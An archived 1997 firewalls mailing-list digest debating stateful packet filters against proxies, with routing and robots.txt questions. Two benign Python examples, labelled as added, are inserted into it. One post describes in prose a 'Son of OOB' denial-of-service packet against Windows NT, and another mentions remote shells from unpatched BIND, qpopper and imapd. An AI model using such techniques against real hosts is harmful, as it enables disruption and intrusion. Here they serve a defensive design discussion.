Cc: hagan@cih.com, sjg@quick.com.au, firewalls@GreatCircle.COM
In-Reply-To: <199706091631.JAA03961@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jun 9, 97 09:36:08 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Ryan Russell/SYBASE, sie said:
> 
> I'm not sure how one would measure reliability, but
> my personal experience has been good.
> 
> I disagree that a SPF != a proxy, at least not
> entirely.

An SPF keeps state information about connections, which may let through
arbitrary packets (so long as port #'s match) or not.  It will let the
entire packet go out, just as it came in or vice versa, so long as it
matches the rules.  It doesn't handle the data, which makes it quicker
and therefore more desirable to use (for some anyway).  It doesn't talk
on your behalf which is what a proxy does.  When using a proxy, you don't
need to (try to) imitate TCP/UDP/ICMP handling because the kernel does
that for you.

> Check out:
> 
> http://futon.sfsu.edu/~rrussell/spfvprox.htm

WARNING: THAT URL CONTAINS A HIGH AMOUNT OF MARKETING CRAP.

Now, let me pick on this:
   ...For example, a SPF will usually work at layer 4 for
   something like telnet, but will go to layer 7 for FTP, because it has
   to. (For an explanation of why FTP is a pain in the ass, check out 
   Comer or Stevens.)
Wrong.  It still goes to layer 4 for FTP.  Why ?  Because it is still
dealing with packets, not a data stream.

    1. Proxies are a special case of a SPF.

Wrong.  FWIW, proxies can be implemented at layers 5, 6 or 7.

   Is a proxy that doesn't validate or
   modify the data in any way really "operating" at layer 7, or is it,
   for all practical purposes, operating at layer 4? Sure, the OS has to
   filter the packet all the way up to the application, and the
   application has to send it all the way back down the stack to go out
   the NIC, but so what? Did it do anything except waste CPU time that it
   didn't need to? If you break out your sniffer, and compare the
   conversations between a SPF and a proxy like the one above, will you
   see any difference? No. In fact, the proxy is doing nothing more than
   many-to-one NAT.

I put this to you: if you connect a sniffer to both sides of a firewall,
one using SPFs and the other proxies, you will see vastly different types
of "packet conversations" between the firewall and the external host it is
connecting to.  The assertion about "wasted CPU time" is purely subjective
and has no real meaning.

    1. SPFs can be the more secure choice depending on the requirements.

   In this section is the little bit of math I warned about. Trust me, it
   won't be painful.

I think you forgot how to count too.

   Ok, so SPFs can have bugs too, right? Sure. So, now you
   have to "proxy" two protocols. You still don't want to do any special 
   filtering, just pass it through. So, let's assume that proxies have
   one bug each, as do SPFs. So, we have one SPF and two proxies. One bug
   with the SPF and two for the proxies.

That is crap.  If you are using the same code for the SPF then you should be
able to use the same code for the proxy.

If the proxies are different for each, it indicates to me that the SPF
solution hasn't really been developed for either protocol whereas the
proxies have been tailored properly for a better fit.

    1. Network address translation (NAT) can be considered a form of     
       security on its own.

   Bonus argument! This isn't directly related to SPFs vs. proxies, but I
   hope I've demonstrated the relationship, and it's another one of those
   questions I see often that I've been meaning to write down.

Well, obviously you're not trying to sell the Cisco PIX anymore.

Overall, that page says lots of things but doesn't compare SPFs and proxies
very well.

> I might also disagree that SPFs do not work
> universally well as proxies.  You'd have to explain
> to me what you mean by that exactly... The only
> difficulty I've had with the SPFs I have used is
> with UDP, something that many proxies have
> difficulty with as well.

Are you sure you know what you're talking about ?  I don't get the impression
that you do, given your email and WWW page.

Darren

From owner-firewalls-outgoing  Tue Jun 10 00:43:42 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA13699 for firewalls-outgoing; Mon, 9 Jun 1997 14:13:15 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA13667 for ; Mon, 9 Jun 1997 14:13:02 -0700 (PDT)
Received: from newman by newman (SMI-8.6/SMI-SVR4)
	id RAA15558; Mon, 9 Jun 1997 17:11:49 -0400
Message-ID: <339C7195.FFC9CA94@unifiedtech.com>
Date: Mon, 09 Jun 1997 17:11:49 -0400
From: Mike Jones 
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u)
MIME-Version: 1.0
To: Andrew & Terri Forster 
CC: firewalls@greatcircle.com
Subject: Re: TCP/IP Addressing Problems with FireWall
X-Priority: 3 (Normal)
References: <3.0.1.32.19970609224754.0069e2fc@emirates.net.ae>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Andrew & Terri Forster wrote:
> 
> We purchased "gauntlet-type" proxy server firewall to complete our
> perimeter defences project including connection to the Internet.
> 
> We are having problems of Internal clients being able to see (ping) the
> Firewall and for the BSDI FireWall box to ping internal machines across our
> internal router.  I have prepared a rough diagram below then some
> explanations.
> 
>           I N T E R N E T
>                  |
>                  |
>           _______|_______
>          |               |
>          |               |  Internet Router 194.bbb.ccc.1 s/net 255.255.255.0
>          |_______________|
>                  |
>                  |
>       ___________|_____________________________   194.bbb.ccc.* Network
>                      |
>                      |
>                      |
>             _________|___________   Outside 194.bbb.ccc.9 s/net 255.255.255.0
>            |                     |       Default Router  194.bbb.ccc.1
>            |       Firewall      |
>            |_____________________|  Inside 172.17.100.1 s/net 255.255.0.0
>                      |
>                      |
>       _______________|_________________________  172.17.*.* Network (B Class)
>                |                     |
>                |               ______|______
>                |              |  W95 Client |  172.17.30.13 B S/net
>                |              |_____________|  Gateway 172.17.200.2
>                |
>                |
>       _________|_____________________
>      |     172.17.200.2              |
>      |       Cisco Router            |____________________  172.20.*.*
>      |       172.16.200.2            |                       (B Class)
>      |____________|__________________|
>                   |
>                   |
>       ____________|____________________________  172.16.*.* Network (B Class)
>                                 |
>                                 |
>                            _____|_______
>                           | W95 Client  |  172.16.30.11 (Gateway 172.16.200.2)
>                           |_____________|
> 
> Note this is a test implementation of our final IP addressing Plan.  Our
> registered IP C Class is used on the outside of the FireWall proxy server
> firewall 194.bbb.ccc.* and our inside of the Firewall we use a 172.17.*.*
> B class network to our internal Router which also has other non-internet
> data feeds (eg 172.20.*.* above).  On the inside of this internal router we
> are planning to use the IP address 172.16.*.* B Class network.
> 
> Our problem is that clients on the 172.16.*.* network cannot ping (see) the
> firewall as its default router (gateway) is set as 194.bbb.ccc.1.  Also the
> clients on the 172.17.*.* network can see the internal network only when
> the gateway is set as the 172.17.200.2 interface of the Router.  Therefore
> it will not be able to see the Internet as all traffic is sent to the
> inside not the outside.  The other external connections work fine as they
> all refer to their Internal Router port as their default router (gateway).
> Obviously I need to determine how to solve this so that the external
> traffic is directed to the Internet by the firewall and inside traffic
> correctly through the Router to the 172.16.*.* subnet.
> 
> Any Assistance would be appreciated

Your firewall needs to have a static route to the 172.16 network
pointing to 172.17.200.2. That will probably solve the entire 
problem, as your ping failures from internal systems to the
firewall are probably happening when the firewall tries to send
the ping response. 

Let me make a guess: the 172.17 network is on a switch. 
If it were on a hub, it wouldn't matter which router the clients
had set up as their default gateway because both the firewall and
the router would see the packets. If it's on a switch, then 
the router won't see packets that are sent to the firewall. Setting
up the static route, however, should cause the firewall to 
forward the packets to the router; sort of a bank shot, as it were.

--
	Mike Jones
	Sr. Technology Advisor
	UNIFIED Technologies
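Mike's static-route fix, as an added example that is not from the thread: a longest-prefix-match lookup over a routing table built from Andrew's diagram, showing which interface and next hop the firewall's ping reply to a 172.16 client takes with and without the route. The public prefix 194.bbb.ccc is masked in the post, so 194.0.0.0/24 is a constructed stand-in, and the table contents and the BSD command in the comment are assumptions.

```python
"""Added example (not from the thread): where the BSDI firewall's reply
to a 172.16.x.x client goes before and after the static route to
172.16.0.0/16 via the internal router 172.17.200.2 is added."""
import ipaddress

PUBLIC_GW = "194.0.0.1"  # stand-in for 194.bbb.ccc.1 (the real prefix is masked)


def make_table(with_static_route):
    """Routing table entries as (network, next hop or None if directly
    connected, interface).  Constructed from the diagram in the post."""
    table = [
        (ipaddress.ip_network("194.0.0.0/24"), None, "outside"),   # stand-in for 194.bbb.ccc.0/24
        (ipaddress.ip_network("172.17.0.0/16"), None, "inside"),
        (ipaddress.ip_network("0.0.0.0/0"), PUBLIC_GW, "outside"),  # default route
    ]
    if with_static_route:
        # Assumed BSD syntax for what Mike recommends:
        #   route add -net 172.16.0.0 -netmask 255.255.0.0 172.17.200.2
        table.append((ipaddress.ip_network("172.16.0.0/16"), "172.17.200.2", "inside"))
    return table


def lookup(table, dst):
    """Longest-prefix match: the most specific entry containing dst wins."""
    addr = ipaddress.ip_address(dst)
    best = None
    for net, gw, iface in table:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gw, iface)
    return best


def reply_path(with_static_route, client):
    """(interface, next hop) the firewall uses for a packet back to client.
    A directly connected destination is its own next hop."""
    net, gw, iface = lookup(make_table(with_static_route), client)
    return iface, gw or client


if __name__ == "__main__":
    # Without the route the reply to the 172.16 client leaves by the
    # outside interface towards the Internet router and never arrives.
    print("no static route :", reply_path(False, "172.16.30.11"))
    print("static route    :", reply_path(True, "172.16.30.11"))
    print("172.17 client   :", reply_path(True, "172.17.30.13"))
```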

From owner-firewalls-outgoing  Tue Jun 10 00:46:05 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA28054 for firewalls-outgoing; Mon, 9 Jun 1997 15:47:48 -0700 (PDT)
Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA28008 for ; Mon, 9 Jun 1997 15:47:32 -0700 (PDT)
Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id RAA10247; Mon, 9 Jun 1997 17:48:39 -0500
Date: Mon, 9 Jun 1997 17:48:39 -0500
From: Craig Brozefsky 
Subject: Re: Stateful Packet Filters vs. Proxies
To: Mike Jones 
cc: firewalls@GreatCircle.COM
In-Reply-To: <339C52F9.2ADBE22F@unifiedtech.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 9 Jun 1997, Mike Jones wrote:
> > I gave an example earlier of smapd, and the capabilities it presents.
> 
> Let me continue to be a contrarian and claim that mail, like other
> applications, should not necessarily be handled at all at the
> firewall. A firewall is first and foremost an access control device,
> and running an application (even a simple mail forwarder, like smap)
> is not an optimal use of the firewall. I feel much the same way
> about http proxying and filtering.

Outside of a belt and garters approach, where a non-trusted application 
server provides the application service from within a DMZ behind the 
first firewall, and with another firewall between it and the internal 
network, I would much rather have the proxy executing on the firewall, 
as a non-privileged user and performing a subset of the application 
(only MAIL FROM RCPT TO: etc..) and designed with security in mind, than 
having the stream passed thru a SPF running in kernel mode and then into 
my internal MTA, which unless it is qmail, was not designed with security 
in mind.  The application level proxy is just that, a proxy, not the full 
application, and it runs as non-privileged code.

> > How about strong authentication at the firewall?  Presenting a POP3
> > interface that uses APOP?
> 
> How about strong authentication? Firewall-1 has offered SecurID
> authentication for quite a while now. And I'd rather not have my
> firewall present a POP3 interface at all, thank you. APOP or no
> APOP, POP3 isn't exactly a model citizen as a protocol.

I hope they have other types of strong auth, they do right?  SecurID is 
known to be weak, papers have been published exposing the lameness of 
its auth scheme, and it also does not do stream level encryption last I 
heard.  

Please don't waffle 'isn't exactly model citizen as a protocol'.  Other 
than lack of payload encryption can you name one protocol level failure 
of POP3?  It's the implementation that's the problem usually, temp file 
creation problems, user auth problems, buffer overflow in gethostbyaddr 
handling.  An application level proxy need not implement the mailbox 
reads and such, but passes the requests to an internal POP3 server, 
handles the response and passes those to the client.  With an SPF unless 
source addresses of the incoming POP connection are re-written to look 
like a connection from the firewall's internal interface, you would still 
be susceptible to the libresolv bugs (gethostbyaddr, gethostbyname) that have 
been found on some nixes recently.  

> You could not exploit them on an SPF, either, since it wouldn't be
> running the MTA. This (to me) falls into the category of not 
> neglecting security on internal systems just because you have
> a firewall in place.

But I could get damn near any nix out there running BIND, or qpopper or 
the uwashington imapd to give me shell unless you patched them.  Having 
such attacks stopped at the firewall means that I don't have to rely on 
patches and vendor response time to make me safe.

> Actually, I think you have it backward. We find ourselves in the
> enviable position of having most of our proxy-based firewalls 
> written by good people who know what they're doing, thereby having
> a lot of good proxies (smap being a fine example) to use as examples.
> However, those proxies theoretically are prone to buffer overflow
> attacks in the same way as the service daemons they're protecting
> are. Since an SPF doesn't reassemble or interpret entire service
> requests, it's immune to (for example) a buffer overflow attack
> based on the way a particular SMTP command is interpreted.

SPFs are not inherently immune from attacks, they are rewriting and 
processing information, maintaining state, as well as having to perform 
complex rebuilding of IP packets etc...  This is not IMO a valid point.  
And since they run in privileged mode, an attack means total 
compromising of your firewall.  There are exploits in TCP/IP stacks, 
there will be exploits in SPFs.

The application proxies run in non-privileged spaces, and thus their 
compromise means fewer resources are given over to the attacker.  You also 
have one application which needs to know about various attacks on a 
service, and how to defend against them, rather than an SPF which now 
must keep track of several vendors' implementations of a service for new 
bugs so that it may properly protect them.  So SPFs have to be aware of 
design problems in protocols, as well as the implementation problems of 
any vendor who may be behind them since it's those machines which are 
doing the actual provision of service.  In contrast an application proxy 
needs to be aware of design problems of the protocol, but only one set of 
implementation exploits, its own, one code base to track, and that code 
base is developed with security in mind, and executing in an environment 
designed with security in mind, the firewall's execution context.

In an ideal world all daemons would be as well designed as qmail, and 
Microsoft would not exist.

> I'd say that a proxy that doesn't do that is hardly worth the name.

I agree 8)  I also think that a lot of our disagreements are largely 
semantic, and can go either way in a real world situation.

Craig Brozefsky              craig@onshore.com
onShore Inc.                 http://www.onshore.com/~craig
Development Team             p_priority=PFUN+(p_work/4)+(2*p_cash)


From owner-firewalls-outgoing  Tue Jun 10 01:26:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA18464 for firewalls-outgoing; Tue, 10 Jun 1997 00:59:24 -0700 (PDT)
Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA18257 for ; Tue, 10 Jun 1997 00:58:26 -0700 (PDT)
Received: from Mailhub by garanti1.garanti.com.tr 
          id AA18044; Tue, 10 Jun 1997 10:59:53 +0400
Received: from GarantiUser by GarantiMailServer
 id AA05846; Tue, 10 Jun 1997 10:59:10 +0400
Received: from fw1.fw.garanti.com.tr by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03)
          id AA05150; Tue, 10 Jun 1997 10:56:52 +0400
Message-Id: <339D95AC.3A63@garanti.com.tr>
Date: Tue, 10 Jun 1997 10:58:04 -0700
From: Cihan Subasi 
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
X-Mailer: Mozilla 3.0Gold (Win16; I)
Mime-Version: 1.0
To: Firewall Mailing List 
Subject: Again out of topic...sorry
Content-Type: text/plain; charset=iso-8859-9
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I would like to install USENET NEWS server on AIX, any shareware
product that you may recommend to me???

	Thanks
-- 


***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey

email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404
Fax  = +902126570473
***************************************************************

From owner-firewalls-outgoing  Tue Jun 10 01:49:12 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA16610 for firewalls-outgoing; Mon, 9 Jun 1997 22:10:31 -0700 (PDT)
Received: from norway.it.earthlink.net (norway-c.it.earthlink.net [204.119.177.49]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA04887 for ; Mon, 9 Jun 1997 21:07:04 -0700 (PDT)
Received: from 206.85.112.171 (pool021.max1.canoga-park.ca.us.dynip.earthlink.net [206.85.112.171])
	by norway.it.earthlink.net (8.8.5/8.8.5) with SMTP id VAA22914;
	Mon, 9 Jun 1997 21:07:47 -0700 (PDT)
Message-ID: <339CE163.1B91@earthlink.net>
Date: Mon, 09 Jun 1997 21:08:53 -0800
From: Peter & Diane Dennis 
Reply-To: poohcorner@earthlink.net
X-Mailer: Mozilla 3.0 (Macintosh; I; 68K)
MIME-Version: 1.0
To: firewalls@GreatCircle.COM
Subject: Incorrect emails 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

During the past 48 hours I have received over 370 emails at
'poohcorner@earthlink.net' either from or to your email number or
ssl-talk@netscape.com>.
We have requested urgent assistance from earthlink many times, but they
have failed to explain this phenomenon.
Can you help please.  It's driving us crazy.
Peter Dennis

From owner-firewalls-outgoing  Tue Jun 10 02:31:32 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA05593 for firewalls-outgoing; Mon, 9 Jun 1997 13:23:54 -0700 (PDT)
Received: from burrito.insource.com (burrito.insource.com [206.97.180.105]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA05575 for ; Mon, 9 Jun 1997 13:23:44 -0700 (PDT)
Received: from Ast_J50_2.insource.com (user14.insource.com [206.97.180.124]) by burrito.insource.com (8.8.5/8.7.3) with ESMTP id PAA01558; Mon, 9 Jun 1997 15:25:49 -0500 (CDT)
Message-ID: <339C64B5.7D4DDA9C@burrito.insource.com>
Date: Mon, 09 Jun 1997 15:16:53 -0500
From: Rafe Colburn 
Organization: Insource Technology Corp.
X-Mailer: Mozilla 4.0b5 [en] (Win95; I)
MIME-Version: 1.0
To: Jonathan Tobin 
CC: firewalls@GreatCircle.COM
Subject: Re: robots.txt
X-Priority: 3 (Normal)
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Check out this URL:

	http://info.webcrawler.com/mak/projects/robots/exclusion.html

Jonathan Tobin wrote:
> 
> i am not sure if this is the appropriate place for this kind of inquiry,
> but I would like to know if anybody has info on how to set up a
> robots.txt file; as in, what are its capabilities?
> 
> --jonathan tobin
> www.dyabolyk.com
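For the question above about what a robots.txt file can do, here is an added example (not code from either poster) that parses a file written to the original exclusion standard linked above and answers "may this robot fetch this path?". The sample file is constructed for the example; `ExampleBot` is a made-up robot name. The defender's caveat is built into the comments: the file is advisory, nothing enforces it, and because it is public it should never list paths you actually need to hide.

```python
def parse_robots(text):
    """Parse a robots.txt body into records of (user_agents, disallowed_prefixes).

    Follows the original exclusion standard: records are separated by blank
    lines, each record has one or more User-agent lines and zero or more
    Disallow lines, and '#' starts a comment. Nothing here is enforced by the
    server; a well-behaved robot reads it and decides for itself.
    """
    records, agents, disallows = [], [], []
    for raw in text.splitlines() + [""]:          # sentinel blank line closes the last record
        line = raw.split("#", 1)[0].strip()
        if not line:
            if agents:
                records.append((agents, disallows))
            agents, disallows = [], []
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            agents.append(value.lower())
        elif field == "disallow":
            if value:                              # an empty Disallow means nothing is off limits
                disallows.append(value)
    return records


def record_for(records, robot_name):
    """Pick the record whose User-agent token is a substring of the robot's name;
    fall back to the '*' record; None if neither exists (everything allowed)."""
    name = robot_name.lower()
    wildcard = None
    for agents, disallows in records:
        for agent in agents:
            if agent == "*":
                wildcard = (agents, disallows)
            elif agent in name:
                return (agents, disallows)
    return wildcard


def is_allowed(records, robot_name, path):
    """True if the robot may fetch path. Disallow values are path prefixes,
    so '/cgi-bin/' covers everything under it."""
    rec = record_for(records, robot_name)
    if rec is None:
        return True
    return not any(path.startswith(prefix) for prefix in rec[1])


# Constructed sample file for this example; not from the original thread.
# Note that every Disallow line is itself public, so the file is a map of
# what the site would rather not have indexed, not an access control.
SAMPLE = """\
# keep crawlers out of scripts and scratch space
User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/

User-agent: ExampleBot
Disallow:
"""

if __name__ == "__main__":
    rules = parse_robots(SAMPLE)
    for bot, path in [("Mozilla/3.0", "/cgi-bin/search"),
                      ("Mozilla/3.0", "/index.html"),
                      ("ExampleBot/1.0", "/cgi-bin/search")]:
        verdict = "allowed" if is_allowed(rules, bot, path) else "disallowed"
        print("%-15s %-16s %s" % (bot, path, verdict))
```

Capabilities, in short: per-robot records, a wildcard record, and prefix-based Disallow rules. Anything finer than that (per-file Allow, crawl delays) is an extension, and none of it stops a robot that chooses not to read the file.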

From owner-firewalls-outgoing  Tue Jun 10 03:02:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA10885 for firewalls-outgoing; Mon, 9 Jun 1997 13:58:20 -0700 (PDT)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA10787 for ; Mon, 9 Jun 1997 13:58:01 -0700 (PDT)
Received: from clark.net (proberts@explorer.clark.net [168.143.0.7]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id QAA00489; Mon, 9 Jun 1997 16:58:10 -0400 (EDT)
Received: from localhost (proberts@localhost) by clark.net (8.8.5/8.7.1) with SMTP id QAA11397; Mon, 9 Jun 1997 16:58:34 -0400 (EDT)
X-Authentication-Warning: clark.net: proberts owned process doing -bs
Date: Mon, 9 Jun 1997 16:58:31 -0400 (EDT)
From: "Paul D. Robertson" 
To: Mike Ordun 
cc: firewalls@GreatCircle.COM
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 9 Jun 1997, Mike Ordun wrote:

> Have been following this discussion with a lot of interest as a reseller
> of both SPF and proxy firewalls.  I happen to believe that both are
> appropriate in different circumstances and customer need.  Nevertheless, I
> am a little troubled by the claims that SPFs are inherently
> insecure.  Let me present a challenge.  Let's compare some specific
> commercial offerings -- Firewall-1 in one corner representing SPF and say
> Gauntlet, Raptor, or ANS in the other representing the proxy approach. 
> What I would like is some specific vulnerability that I cannot protect
> myself from using the SPF as opposed to the proxy approach.  Again just

Ok, you're on a protected NT Client machine, and you open a connection to
evil.web, evil.web starts to send you data.  After determining your
browser to be IE for Win32, it sends a packet with URG set, the urgent
pointer set to the same value as "Son of OOB", and advertises an invalid
TCP window size.  With Firewall-1, you've just succumbed to a denial of
service attack.  With any of the listed application layer gateways,
nothing bad happens to your machine.

Specific enough?

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280


From owner-firewalls-outgoing  Tue Jun 10 03:10:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id CAA06392 for firewalls-outgoing; Tue, 10 Jun 1997 02:51:49 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id CAA06340 for ; Tue, 10 Jun 1997 02:51:33 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id CAA05190 for ; Tue, 10 Jun 1997 02:26:00 -0700 (PDT)
Message-Id: <199706100926.CAA05190@miles.greatcircle.com>
Received: by cheops.anu.edu.au
	(1.37.109.16/16.2) id AA283684245; Tue, 10 Jun 1997 19:17:26 +1000
From: Darren Reed 
Subject: Re: Stateful Packet Filters vs. Proxies
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Tue, 10 Jun 1997 19:17:25 +1000 (EST)
Cc: proberts@clark.net, firewalls@GreatCircle.COM
In-Reply-To: <199706100103.SAA04291@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jun 9, 97 06:10:39 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Ryan Russell/SYBASE, sie said:
[...]
> The son of OOB attack is application specific,
> affecting only the Microsoft DNS server and the 
> Microsoft Service at port 139 (which I think is the
> NetBIOS port, not sure.)  It does not affect the
> TCP driver in general.

Looking at samba, I can't see any use of OOB, so I can't see any reason
why NetBIOS would be doing anything special with OOB.  Nor can I find
any use of OOB in BIND 8 (the reference implementation of DNS for the
ISC).

I'm sure if I checked manually, I'd find other TCP services vulnerable
to this attack that don't otherwise use OOB data.  Maybe you're saying
that these two services are vulnerable due to bugs introduced for NT
by Micro$oft ?

> The OOB flag is a perfectly legitimate flag, used by
> a number of protocols, and a firewall of any type would have
> had no reason to filter it until the attack was discovered.  
> Any proxy for those services would quite happily pass
> it on inside to any host in your network.

Wrong.  Unless an application proxy is programmed to recognise and pass
on OOB data, OOB data will be treated as in-stream data and the OOB
markers discarded & ignored.  For example, OOB data has no place in
FTP/HTTP (that I'm aware of), but TELNET/RLOGIN both use it.  What's
more, if someone deliberately sends you a bogus packet that could crash
your NT systems and you have a non-NT application firewall, the proxies
provide protection as the FW's OS must process the OOB data packet (which
may even be discarded).  The SPF can't provide this unless something is
done to handle yet another special case.

> Think of it this way.. Say I discover that if I throw the
> word "fred" into the datastream of an HTTP connection
> Netscape will delete your harddrive.  You're telling me
> that there are proxies out there that automatically
> filter out the word fred?  Before I announce the attack?

No, and neither will your SPFs.  But that is not the case, in this
instance.  The "problem" is already handled by proxies and nothing
extra needs doing (which is not the case for SPFs).

Darren

From owner-firewalls-outgoing  Tue Jun 10 03:42:36 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA03621 for firewalls-outgoing; Mon, 9 Jun 1997 13:11:15 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA03579 for ; Mon, 9 Jun 1997 13:11:00 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id NAA25463 for ; Mon, 9 Jun 1997 13:15:14 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA08776; Mon, 9 Jun 97 13:13:02 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id NAA18279 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 13:11:53 -0700 (PDT)
Message-Id: <199706092011.NAA18279@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  5A1F07E7F8681EF2882564B1006E015C; Mon,  9 Jun 97 13:11:50 EDT
To: "Paul D. Robertson" 
Cc: Ryan Russell/SYBASE ,
        firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 13:06:00 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Yes, I don't believe the SPFs will fragment, keep
separate window sizes, etc.. Unless the layer 2 networks
on each side are significantly different.

No, I don't think that there is anything an SPF 
can block (in the data stream) that a proxy
can't.  But, I will claim that the opposite is true, too.

A SPF has all the same access to a data stream 
that a proxy does.  One could write some SPF
code that would block applets.  Would you
want to?  Probably not.  It would probably be easier
with a traditional proxy.

   Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: proberts@clark.net ("Paul D. Robertson") @ smtp
Date: 06/09/97 02:11:38 PM
Subject: Re: Stateful Packet Filters vs. Proxies

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> I'm not sure how one would measure reliability, but
> my personal experience has been good.
> 
> I disagree that a SPF != a proxy, at least not
> entirely.

Well, the fact that the lower level protocols aren't protected behind the
perimeter is an issue.  With an application layer proxy, only the firewall
needs to correctly handle sequence numbers, TCP window sizes, TCP headers,
etc.  With SPF, the SPF box implementations I've seen don't keep state on
things like that for every connection, and if they do, normally out of
order packet reception is severely degraded. 

At some point, you lose the advantages over application layer gateways if
you keep too much state information.  Also, it's very difficult to code
application layer blocking without a great deal more work, for instance,
blocking  as a tag is different than blocking  as a
string.  

I've still yet to see an example of something a SPF blocks that an
application layer gateway doesn't.  The reverse certainly isn't true of
current implementations.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280





From owner-firewalls-outgoing  Tue Jun 10 04:10:40 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA05139 for firewalls-outgoing; Mon, 9 Jun 1997 13:21:37 -0700 (PDT)
Received: from ax-akl-fw.axon.co.nz (ax-akl-fw.axon.co.nz [202.135.112.17]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA05044 for ; Mon, 9 Jun 1997 13:21:16 -0700 (PDT)
Received: from ax-akl-exchcomm.axon.co.nz (ax-akl-exchcomm.axon.co.nz [128.1.2.60]) by ax-akl-fw.axon.co.nz (AIX4.2/UCB 8.7/) with SMTP id RAA10230 for ; Tue, 18 Apr 2000 17:04:56 +1300 (NZDT)
Received: by ax-akl-exchcomm.axon.co.nz with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5)
	id <01BC7577.70AB3E00@ax-akl-exchcomm.axon.co.nz>; Tue, 10 Jun 1997 08:22:31 +1200
Message-ID: 
From: "Edkins, Rob - Axon AKL" 
To: "'Craig Brozefsky'" 
Cc: "'martin@nii.ncb.gov.sg'" ,
        "'Francisco Lopez (Infovia)'" ,
